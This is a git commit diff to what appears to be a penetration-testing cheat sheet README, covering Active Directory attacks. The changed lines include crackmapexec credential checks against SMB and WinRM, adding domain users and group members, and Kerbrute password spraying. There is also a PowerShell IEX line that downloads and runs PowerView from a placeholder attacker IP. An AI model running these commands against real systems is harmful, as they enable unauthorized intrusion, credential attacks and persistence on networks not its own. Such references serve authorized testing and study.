Update README.md

Joe Totes
2022-09-06 20:32:18 -04:00
committed by GitHub
parent 15bc454d31
commit 17ac566b37


@@ -513,6 +513,9 @@ crackmapexec smb {IP ADDRESS} -u {USER.txt} -p {PASSWORDS.txt} --shares --contin
crackmapexec smb {IP ADDRESS} --pass-pol crackmapexec smb {IP ADDRESS} --pass-pol
crackmapexec smb {IP ADDRESS} --pass-pol -u '' -p '' crackmapexec smb {IP ADDRESS} --pass-pol -u '' -p ''
# Winrm credential check
crackmapexec winrm {IP ADDRESS} -u '{USER}' -p '{PASSWORD}'
# Mount SMB Drive # Mount SMB Drive
sudo mount -t cifs //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/ sudo mount -t cifs //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/
sudo mount -t cifs -o 'username={USERNAME},password={PASSWORD}' //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/ sudo mount -t cifs -o 'username={USERNAME},password={PASSWORD}' //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/
@@ -627,6 +630,12 @@ net user {USERNAME} /domain
# Enumerate all groups in domain # Enumerate all groups in domain
net group /domain net group /domain
# Add user
net user {USERNAME} {PASSWORD} /add /domain
# Add user to group
net group "{GROUP}" {USERNAME} /add
# Kerbrute Brute Force # Kerbrute Brute Force
sudo /opt/kerbrute/kerbrute userenum -d {DOMAIN} --dc {IP ADDRESS} {user.txt} sudo /opt/kerbrute/kerbrute userenum -d {DOMAIN} --dc {IP ADDRESS} {user.txt}
sudo /opt/kerbrute/kerbrute passwordspray -d {DOMAIN} --dc {IP ADDRESS} {user.txt} {passwords.txt} sudo /opt/kerbrute/kerbrute passwordspray -d {DOMAIN} --dc {IP ADDRESS} {user.txt} {passwords.txt}
@@ -655,13 +664,6 @@ SharpHound.exe -c all # RHOST
# Bloodhound python remote access # Bloodhound python remote access
sudo python3 /opt/BloodHound.py/bloodhound.py -u '{USERNAME}' -p '{PASSWORD}' -ns {IP ADDRESS} -d {DOMAIN} -c all sudo python3 /opt/BloodHound.py/bloodhound.py -u '{USERNAME}' -p '{PASSWORD}' -ns {IP ADDRESS} -d {DOMAIN} -c all
# Add user
net user {USERNAME} {PASSWORD} /add /domain
# Add user to group
net group "{GROUP}" {USERNAME} /add
# Powerview example # Powerview example
IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1") IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force